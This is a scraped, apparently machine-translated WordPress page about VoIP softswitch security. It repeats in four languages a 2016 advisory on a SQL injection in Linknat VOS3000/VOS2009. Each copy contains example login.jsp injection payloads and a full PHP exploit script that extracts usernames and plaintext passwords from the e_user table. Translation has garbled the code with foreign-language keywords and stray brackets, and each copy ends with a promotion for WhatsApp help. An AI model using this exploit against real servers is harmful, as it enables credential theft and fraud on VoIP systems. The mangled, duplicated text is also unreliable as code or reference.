        $post স্ট্রিং = ইম[]্প্রোভাইজ করুন('&', $post_আইটেম);
        curl_setopt ($curl, CURLOPT_POST, ১);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post স্ট্রিং);
    }
    $data = curl_exec($curl);
    curl_close($curl);
    $data প্রত্যাবর্তন;
}

ফাংশন কোয়েরি($host, $query) {
    $data = কার্ল ("http://$host/eng/login.jsp";, অ্যারে
            "loginType" => 1,
            "নাম" => "" ইউনিয়ন" । $query । "#",
            "পাস" => "" অথবা "="
        ), শূন্য, সত্য);
    preg_match_all('|' সেট-কুকি: (.*);|U', $data, $matches);
    $cookies = বিস্ফোরিত('; ', $matches);
    $data = কার্ল ("http://$host/eng/welcome.jsp";,[1] অ্যারে(), $cookies, মিথ্যা);
    $parts = বিস্ফোরণ("|", ছাঁটা($data);;

যদি (গণনা($parts) < 7)
        return false;

    return array($parts, $parts);
}

function ascii_table($data) {
    $keys = [3]array_key[4]s(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid = সর্বোচ্চ ($wid, স্ট্রলেন($v);
    }
    প্রতিটি ($k => $v [$k]হিসাবে $wid)[$k] {
        $fmt = "%-{$v}s";
        $sep = str_repeat('-',', $v);[$k]
    }
    $fmt = '| ' . বি[$k]স্ফোরিত(' | ', $fmt)। ' |';
    $sep = '+-'। ('-+-', $sep)। '-+';
    $buf = অ্যারে ($sep, vsprintf($fmt, $keys), $sep);
    $row হিসেবে $data) {
        $buf = vsprintf($fmt, $row);
        $buf = $sep;
    }
    রিটার্ন ই[]ম্প্রোভাইজ ("n", $buf);
}

ব্যানার();[]
"n";
প্রতিধ্বনি "টার্গেট: $hostn";
প্রতিধ্বনি "কলাম #1: $column_একn";
প্রতিধ্বনি "কলাম #2: $column_2n";
প্রতিধ্বনি "টেবিল: $tablen";
প্রতিধ্বনি "অন্যান্য: $othern";
"n";

$results = অ্যারে();
$count_ফলাফল = জিজ্ঞাসা ($host, "নির্বাচন করুন 1,2,Count(*), 4,5,6 থেকে $table
$other");
যদি ($count_ফলাফল) {
    $count = intval ($count_ফলাফল);
    প্রতিধ্বনি "খুঁজে $count সারি...n";

$i=0[0]; $i<$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $column_two="" .="" "=[0]" . hex2bin($result) .
" n";="" }="" else="" {="[1]" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array($column_one" ==""[]> হেক্স২বিন($result), $column_টু
=> হেক্[0]স২বিন($result);।
    }

যদি (গণনা([1]$results) > 0) {
        প্রতিধ্বনি "nn"। ascii_table($results)। "n";
    }
} অন্যথায় {
    প্রতিধ্বনি "সারি গণনা পুনরুদ্ধারকরতে ত্রুটি";
}

?></$count;>

2016 থেকে যারা VOS3000 হ্যাক করার জন্য কিছু SQL ইনজেকশন নরম সামগ্রী ব্যবহার করে, আমাদের নিজস্ব নিরাপত্তা ব্যবস্থা আছে, আমরা এখন আমাদের নিরাপত্তা ব্যবস্থা খুব শক্তিশালী, আমার কাজের ফোকাস সবসময় ভিওআইপি সফট-সুইচের জন্য নিরাপত্তার জন্য ছিল। বেশিরভাগ সময় আমি বিনামূল্যে উপদেশ দিতাম অথবা যতটা সম্ভব বিনামূল্যে তথ্য শেয়ার করতাম। এখনো অনেক নোংরা জিনিস ঘুরে বেড়াচ্ছে, তাই দয়া করে সবসময় সাবধান থাকুন এবং আরো জানুন। অন্যথায় আপনি কখনোই ভাল ব্যবসা করতে পারবেন না। আজকাল যারা VOS3000 ক্লায়েন্ট সফটওয়্যারে লুকানো স্ক্রিপ্ট বা ম্যালওয়্যার ব্যবহার করে VOS সার্ভার হ্যাক করে.

আরও সাহায্যের জন্য আমাকে হোয়াটসঅ্যাপে নক করুন: +880191119966 – আমি সব উপায়ে সাহায্য করব।

COMMENT VOS3000 Get Hacked par SQL Injection Script, empêcher le piratage!

June 4, 2019November 22, 2020 king

Injection SQL Linknat VOS2009/VOS3000


De: Osama Khalid <osama ()="" codinghazard="" com="">D
ate: Thu, 19 mai 2016 16:52:54 +0500</osama>


Une injection SQL a été trouvée dans Linknat VOS3000/VOS2009, un VoIP populaire
softswitch, qui pourrait permettre aux attaquants distants d’accéder à la
informations d’identification stockées en texte brut.

Application: Linknat VOS3000/VOS2009
Versions concernées: 2.1.1.5, 2.1.1.8, 2.1.2.0
URL du fournisseur : http://www.linknat.com/
Bug: SQLi (avec privilèges DBA)
Type: Télécommande
Résolution : Correction, mise à niveau vers 2.1.2.4 ou 2.1.6.0 Version propre
Référence: Wooyun-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

Le SQLi signalé est aveugle basé sur le temps. Comme il ne s’agit pas d’un SQLi en bande, le
résultats peuvent être recueillis à partir de la sortie de bienvenue.jsp au cours de la même
Session.

(1ère demande)

POST http://target/eng/login.jsp
PARAM loginType=1
        name=' union select 1,2,@@version,'hello',5,6#
        pass=' OU ''='

(2ème demande au cours de la même session)

GET http://target/eng/welcome.jsp
RÉSULTAT 0|' sélection syndicale
1,2,@@version,'hello',5,6#|1|5.0.51a-community|hello|0.00|0.00|

<?[ EXPLOIT CODE ]php
#
# Linknat VOS2009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv;
$column_one [1]  = isset($argv) ? $argv : "l[2]oginname"[2];
$column_two   = isset($argv) ? $argv : "pas[3]sword";
$[3]table        = isset($argv) ? $argv : "e_us[4]er";
$oth[4]er        = isset($argv) ? $argv : "";

f[5]unction b[5]anner() {
    echo "########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php n";
    echo "php vos3000.p[HOST]hp 127.0.0.1n";
    echo "php vos3000.php     n";
    echo "php vos3000[HOST].[COL1]p[COL2]h[TABLE]p[OTHER SQL] 127.0.0.1 table_schema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) {
        avantach ( $post comme $key => $value)
            $post_items = $key . '=' . urlencode($value);
      []  $post_string = implose('',$post_items);
        curl_setopt($curl, CURLOPT_POST, 1);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post_string);
    }
    $data = curl_exec($curl);
    curl_close($curl);
    $data de retour;
}

requête de fonction($host, $query) {
    $data = curl(« http://$host/eng/login.jsp »;, tableau(
            « loginType » => 1,
            « nom » => « ' union « . $query . "#",
            « pass » => « ' OU ''=' »
        ), null, vrai);
    preg_match_all('| Set-Cookie: (.*);|U', $data, $matches);
    $cookies = implose( »; ' $matches);
    $data = curl(« http://$host/en[1]g/welcome.jsp »;, array(), $cookies, false);
    $parts = explode(« | », trim($data));

si (compte($parts) < 7)
        return false;

    return array($parts, $parts);
}

function ascii_table($data[3]) {
    [4]$keys = array_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid = max($wid, strlen($v));
    }
    foreach($[$k]wid comme $k[$k] => $v) {
        $fmt = « %-{$v}s »;
        $sep = str_repeat('-[$k]', $v);
    }
    $fmt = '|[$k] ' . imploser(' | ', $fmt) . ' |';
    $sep = '+-' . imploser('-+-', $sep) . '-+';
    $buf = tableau($sep, vsprintf($fmt, $keys), $sep);
    foreach($data comme $row) {
        $buf = vsprintf($fmt, $row);
        $buf = $[]sep;
    }
    retour implode(« n », []$buf);
}

bannière();
écho « n »;
écho « Cible: $hostn »;
écho « Colonne #1: $column_onen »;
écho « Colonne #2: $column_twon »;
écho « Table: $tablen »;
écho « Autre: $othern »;
écho « n »;

$results = tableau();
$count_result = query($host, « SELECT 1,2,COUNT(*),4,5,6 FROM $table
$other »);
si ($count_result) {
    $count = intval($count_result);
    écho « Trouvé $count lignes...n [0]»;

pour ($i=0; $i<$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $column[0]_two="" .="" "=" . hex2bin($result) .
" n";="" }[1]="" else="" {="" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array($co[]lumn_one" ==""> hex2bin($result), $colum[0]n_two
=> hex2bin($result));
    }
[1]
si (compte($results) > 0) {
        écho « nn » . ascii_table($results) . « n »;
    }
} autre {
    écho « error retriving row count » ;
}

?></$count;>

À partir de 2016 Les gens utilisant quelques articles doux d’injection SQL pour pirater VOS3000, Nous avons notre propre système de sécurité à partir de ce moment, nous avons mis à jour notre système de sécurité trop fort maintenant, mon objectif de travail a toujours été pour la sécurité pour voip soft-switch. La plupart du temps, j’ai donné des conseils gratuits ou partagé des informations autant possible gratuitement. Pourtant, il ya beaucoup de choses sales courir autour, donc s’il vous plaît être prudent toujours et en savoir plus. Sinon, vous ne serez jamais en mesure de faire de bonnes affaires jamais. Maintenant-un-jours Personnes utilisant des scripts cachés ou des logiciels malveillants dans le logiciel client VOS3000 pour pirater VOS Server.

Pour plus d’aide Frappez-moi dans WhatsApp: +8801911119966 – je vais faire aider tous les moyens.

كيف VOS3000 الحصول على اختراق من قبل SQL حقن البرنامج النصي، ومنع القرصنة!

June 4, 2019November 22, 2020 king

Linknat VOS2009/VOS3000 حقن SQL


من: أسامة خالد <osama ()="" codinghazard="" com="">التاري
خ: الخميس, 19 مايو 2016 16:52:54 +0500</osama>


تم العثور على حقنة SQL في لينكنات VOS3000/VOS2009، وهو VoIP شعبية
softswitch، التي يمكن أن تسمح للمهاجمين عن بعد للوصول إلى
بيانات الاعتماد المخزنة في نص عادي.

التطبيق: لينكنات VOS3000/VOS2009
الإصدارات المتأثرة: 2.1.1.5, 2.1.1.8, 2.1.2.0
URL البائع: http://www.linknat.com/
خطأ: SQLi (مع امتيازات DBA)
النوع: عن بعد
القرار: ثابت، الترقية إلى 2.1.2.4 أو 2.1.6.0 النسخة النظيفة
المرجع: WooYun-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

SQLi ذكرت هي عمياء القائمة على الزمن. نظرا لأنه ليس في النطاق SQLi ، و
ويمكن جمع النتائج من الناتج من الترحيب .jsp خلال نفس
الدوره.

(الطلب الأول)

http://target/eng/login.jsp
تسجيل الدخول PARAMاًايناًالم
        name=' حدد الاتحاد 1,2,@@version,'مرحبا',5,6#
        تمرير =' أو ''='

(الطلب الثاني خلال الدورة نفسها)

الحصول على http://target/eng/welcome.jsp
اختيار 0|'الاتحاد
1,2,@@version,'مرحباً',5,6#|1|5.0.51a-المجتمع|مرحباً|0.00|0.00|||

<?php
#
#[ EXPLOIT CODE ] Linknat VOS2009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv;
$column_one   [1]= isset($argv) ? $argv : "log[2]inname";
[2]$column_two   = isset($argv) ? $argv : "pass[3]word";
$t[3]able        = isset($argv) ? $argv : "e_us[4]er";
$othe[4]r        = isset($argv) ? $argv : "";

f[5]unction b[5]anner() {
    echo "########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php n";
    echo "php vos30[HOST]00.php 127.0.0.1n";
    echo "php vos3000.php     n";
    echo "php vo[HOST]s[COL1]3[COL2]0[TABLE]0[OTHER SQL]0.php 127.0.0.1 table_schema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) {20
        foreach ( $post $key = > $value)
            $post_items = $key . '=' . urlencode ($value[]) ؛
        $post_string = "الهدّة" ('&&'، $post_items)؛
        curl_setopt ($curl، CURLOPT_POST، 1)؛
        curl_setopt ($curl، CURLOPT_POSTFIELDS، $post_string)؛
    }
    $data = curl_exec ($curl)؛
    curl_close ($curl)؛
    العودة $data ، ولكن
}

استعلام الدالة($host، $query) {
    $data = حليقة ("http://$host/eng/login.jsp";, صفيف
            "loginType" = > 1،
            "name" => "الاتحاد" . $query . "#",
            "تمرير" = > "' أو ''='"
        )، فارغة، صحيحة)؛
    preg_match_all('| تعيين ملف تعريف الارتباط: (.*); |U'، $data، $matches)؛
    $cookies = تنهار ('؛ '، $matches)؛
    [1]$data = حليقة ("http://$host/eng/welcome.jsp";, array(), $cookies, false);
    $parts = تنفجر ("|", تقليم ($data));

إذا (العد($parts) < 7)
        return false;

    return array($parts, $parts);
[3]}

funct[4]ion ascii_table($data) {
    $keys = array_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid = الحد الأقصى[$k] ($wid، str[$k]len($v))؛
    }
    foreach($wid $k = > $v) {
        $fmt = "%-{$[$k]v}s";
        $sep = str_r[$k]epeat ('-'، $v)؛
    }
    $fmt = '| ' . تنهار (' | '، $fmt) . ' |';
    $sep = '+-' . تنهار ('-+-'، $sep) . '-+';
    $buf = صفيف ($sep، $sep vsprintf($fmt، $keys)، و
    foreach($data كما $row)
        $buf = vsprintf ([]$fmt، $row)؛
        $buf = $sep؛
    []}
    العودة تنهار ("n", $buf);
}

راية();
echo "n";
صدى "الهدف: $hostn";
صدى "عمود #1: $column_onen";
صدى "العمود #2: $column_twon";
صدى "جدول: $tablen";
صدى "أخرى: $othern"؛
echo "n";

$results = صفيف();
$count_result = استعلام($host، "حدد 1,2,COUNT(*), 4,5,6 من $table
$other")؛
إذا ($count_result) {
    $count = intval ($count_result);
    echo "العثور على $count الصفوف...n"[0];

لـ ($i= 0؛ $i<$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $colum[0]n_two="" .="" "=" . hex2bin($result) .
" n";="" [1]}="" else="" {="" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array([]$column_one" ==""> سداسي عشري ($result)،[0] $column_two
=> سداسي عشري ($resu[1]lt));
    }

إذا (عدد($results) > 0) {
        echo "nn" . ascii_table($results) "n";
    }
} آخر {
    echo "خطأ في استرداد عدد الصفوف"؛
}

?></$count;>

من 2016 الناس باستخدام بعض أجهزة حقن SQL لينة الإختراق VOS3000, لدينا نظامنا الأمن الخاصة من ذلك الوقت, قمنا بتحديث نظامنا الأمني قوية جدا الآن, كان تركيز عملي دائما للأمن لvoip لينة التبديل. معظم الوقت أعطى نصيحة مجانية أو تبادل المعلومات قدر الإمكان مجانا. لا يزال هناك الكثير من الأشياء القذرة يركض، لذا يرجى توخي الحذر دائما ومعرفة المزيد. وإلا فإنك لن تكون قادرة على القيام بأعمال تجارية جيدة من أي وقت مضى. الآن في أيام الناس باستخدام البرامج النصية المخفية أو ملورس في VOS3000 برنامج العميل الإختراق VOS Server.

لمزيد من المساعدة تدق لي في ال WhatsApp: +880191119966 – سأفعل مساعدة جميع الطرق.

COME VOS3000 Ottenere Hacked da SQL Injection Script, prevenire l'hacking!

June 4, 2019November 22, 2020 king

Linknat VOS2009/VOS3000 SQL injection


Da: Osama Khalid <osama ()="" codinghazard="" com="">D
ata: Giovedi, 19 Maggio 2016 16:52:54</osama>


Un'iniezione SQL è stata trovata in Linknat VOS3000/VOS2009, un voIP popolare
softswitch, che potrebbe consentire agli aggressori remoti di accedere al
credenziali memorizzate in testo normale.

Applicazione: Linknat VOS3000/VOS2009
Versioni interessate: 2.1.1.5, 2.1.1.8, 2.1.2.0
URL fornitore: http://www.linknat.com/
Bug: SQLi (con privilegi DBA)
Tipo: Remoto
Soluzione: fisso, aggiornamento a 2.1.2.4 o 2.1.6.0 Versione pulita
Riferimento: WooYun-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

SqLi segnalato è cieco basato sul tempo. Poiché non si tratta di un SQLi in banda,
risultati possono essere raccolti dalla produzione di .jsp durante lo stesso
Sessione.

(prima richiesta)

POST http://target/eng/login.jsp
Tipo di login PARAM 1
        name: 'unione selezionare 1,2,@@version,'ciao',5,6
        pass: OR '''

(seconda richiesta durante la stessa sessione)

GET http://target/eng/welcome.jsp
RISULTATO 0'' unione select
1,2,@@version,'ciao',5,6' 1'5.0.51a-community'hello'0.[ EXPLOIT CODE ]0.00

<?php
#
# Linknat VOS2009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $arg[1]v;
$column_one   = isset($arg[2]v) ? $arg[2]v : "loginname";
$column_two   = isset($argv[3]) ? $argv[3] : "password";
$table        = isset($argv[4]) ? $argv[4] : "e_user";
$other        = isset($argv)[5] ? $argv [5]: "";

function banner() {
    echo "########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php n";[HOST]
    echo "php vos3000.php 127.0.0.1n";
    echo "php vos3000.php     [HOST]n[COL1]"[COL2];[TABLE]
[OTHER SQL]    echo "php vos3000.php 127.0.0.1 table_schema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0)
        foreach ($post come $key di > $value)
            $post_items - $key .[] '=' . urlencode($value);
        $post_string : implode('&', $post_items);
        curl_setopt($curl, CURLOPT_POST, 1);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post_string);
    }
    $data : curl_exec ($curl);
    curl_close($curl);
    restituire $data;
}

funzione query($host, $query)
    $data : curl("http://$host/eng/login.jsp";, array(
            "loginType" - > 1,
            "nome" - > "' unione " . $query . "#",
            "pass" - > "' OR ''''"
        ), null, true);
    preg_match_all('' Set-Cookie: ($matches $data.
    $cookies : implodere('; ', $matches);
    $data : [1]curl("http://$host/eng/welcome.jsp";, array(), $cookies, false);
    $parts : esplodi ("""" , trim($data));

if (count($parts) < 7)
        return false;

    return array($parts, $parts);
}

func[3]tion asc[4]ii_table($data) {
    $keys = array_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid : max($wid, strlen([$k]$v));
    }[$k]
    foreach($wid come $k di > $v)
        $fmt: "%-$v";
        $[$k]sep : str_repeat ('-', $v)[$k];
    }
    $fmt : ' ' . implodere(' ', $fmt) . ' |';
    $sep di tipo '-' . implode ('--', $sep) . '-+';
    $buf: array($sep, vsprintf($fmt, $keys), $sep);
    foreach($data come $row)
        $buf vsprintf($fmt, $row)[];
        $buf - $sep;
    }
    rest[]ituire implode(""n", $buf);
}

banner();
eco "n";
eco "Target: $host";
echo "#1: $column_one";
echo "Colonna #2: $column_due";
eco "Tabella: $table n";
eco "Altro: $other n";
eco "n";

$results : array();
$count_result : query($host, "SELECT 1,2,COUNT('),4,5,6 FROM $table
$other");
if ($count_result)
    $count : intval($count_result);
    echo "Trovato $count righe...

for ($i 0; $i<[0]$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $column_two="" .="" "=[0]" . hex2bin($result) .
" n";="" }="" else="" {="[1]" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array($column_one" =="[]"> hex2bin($result), $column_2
<>a0></a[0]0> $result a1><
    }

if (count([1]$results) > 0)
        echo "n"n" . ascii_table($results) . "n";
    }
- altro .
    echo "Errore durante il recupero del numero di righe";
}

?></$count;>

Dal 2016 Persone che utilizzano alcuni prodotti soft iniezione sql per incidere VOS3000, Abbiamo il nostro sistema di sicurezza da quel momento, abbiamo aggiornato il nostro sistema di sicurezza troppo forte ora, il mio obiettivo di lavoro era sempre per la sicurezza per voip soft-switch. La maggior parte del tempo ho dato consigli gratuiti o informazioni condivise il più possibile gratuitamente. Ancora ci sono un sacco di cose sporche in giro, quindi si prega di stare attenti sempre e saperne di più. Altrimenti non sarai mai in grado di fare buoni affari mai. Ora-a-days Persone che utilizzano script nascosti o malware nel software client VOS3000 per hackerare VOS Server.

Per più aiuto Knock me in whatsapp: 8801911119966 – farò aiutare tutti i modi.

Posts navigation

Older Posts
Newer Posts

Recent Posts

  • Sistema VOS3000 Tarifas LCR True Essential: Tabla de Tarifas, Prefijos, Ruteo Menor Costo y Area Codigos
  • Sistema VOS3000 Troncal SIP Important: Registro Upstream, Dominio Local, Cabeceras y Transparencia
  • Sistema VOS3000 Media Proxy Accurate: Configuracion, Ancho de Banda, Transcodificacion y Protocolo
  • Sistema VOS3000 Casos Facturacion Real Critical: Cero Duracion, Hangup Servidor, Prefijo Ruta y Tiempo Libre
  • Sistema VOS3000 Patrones Marcacion Important: Wildcards, Longitud, Escape y Ruteo Aleatorio
  • Sistema VOS3000 API Control Llamadas Important: Callback, PlayAudio, InterruptCall y CDR Externo
  • Sistema VOS3000 API Monitoreo Powerful: Telefono Online, Llamadas Activas, Webhooks y Alertas
  • Sistema VOS3000 IVR DTMF Effective: Deteccion Inband, Modo Parse, Buzon Voz y Navegacion
  • Sistema VOS3000 IVR Callback Proven: Temporizacion, Estado UDP, Alarma Vocal y CRBT
  • Sistema VOS3000 Seguridad SIP Critical: TCP Reset, Registro Kick, Registro Ligero y Mapeo Timeout
  • Sistema VOS3000 Desvio Llamadas Dynamic: Cinco Tipos, DND, Fallback Offline y Redirect Externo
  • Sistema VOS3000 Autorizacion Telefonos Best: Jerarquia, Cargos Inversos, DID y Consumo Mensual
  • Sistema VOS3000 Identificacion Llamadas Important: Caller ID, Callee, Ring Back y Senal Desvio
  • Sistema VOS3000 Pasarelas Avanzadas Proven: Opciones SIP, Tono Ring, Fax T38 y Lineas Reservadas
  • Sistema VOS3000 Rentabilidad Ruteo Best: Ganancia Minima, Tarifa Maxima, Verificacion y Ordenamiento
  • Sistema VOS3000 Failover Pasarelas True Strategic: Limite Switch, RTP Lock, Agresivo y ASR Costo
  • Sistema VOS3000 Registro Salida SIP Important: Expiracion, Reintento, Privacidad y Dominio Local
  • Sistema VOS3000 Sesion SIP Reliable: Retransmision, Timer Refresh, Early Hangup y PRACK
  • Sistema VOS3000 CDR Tiempo Real Powerful: Reenvio, Consultas, Modos y Direccion Fin
  • Sistema VOS3000 Facturacion Precisa Important: Redondeo, Sobregiro, Tiempo Libre y Decimales
  • Sistema VOS3000 Mantenimiento Datos Important: Limpieza, Backup y Optimizacion del Sistema
  • Sistema VOS3000 Abuso Llamadas Robust: Limites Concurrentes, Prevencion y Full Control de CPS
  • Sistema VOS3000 Protocolo H323 Important: Configuracion, Puertos y Comparacion con SIP
  • Sistema VOS3000 Codecs Prioridad Accurate Strategic: Seleccion, Transcodificacion y Ahorro de Ancho de Banda
  • Sistema VOS3000 Autenticacion SIP Critical: Digest Auth, Limites y Respuesta a Intrusos
[email protected]
+8801911119966
Change VOS3000 2.1.9.07 Chinese Client to English Client Easy Step!Change VOS3000 2.1.9.07 Chinese Client to English Client Easy Step!
VOS3000 VoIP Softswitch – Complete Guide, Features, Installation &amp; SecurityVOS3000 VoIP Softswitch – Complete Guide, Features, Installation & Security
VOS3000 2.1.8.00 / 2.1.8.05 Complete English Manual Download Free!VOS3000 2.1.8.00 / 2.1.8.05 Complete English Manual Download Free!
Configuración servidor LRN VOS3000 Reliable parámetros SS_LRN_SERVER_IP PORTConfiguración servidor LRN VOS3000 Reliable parámetros SS_LRN_SERVER_IP PORT
Proudly powered by WordPress | Theme: Nucleare by CrestaProject.
Back to top
WhatsApp chat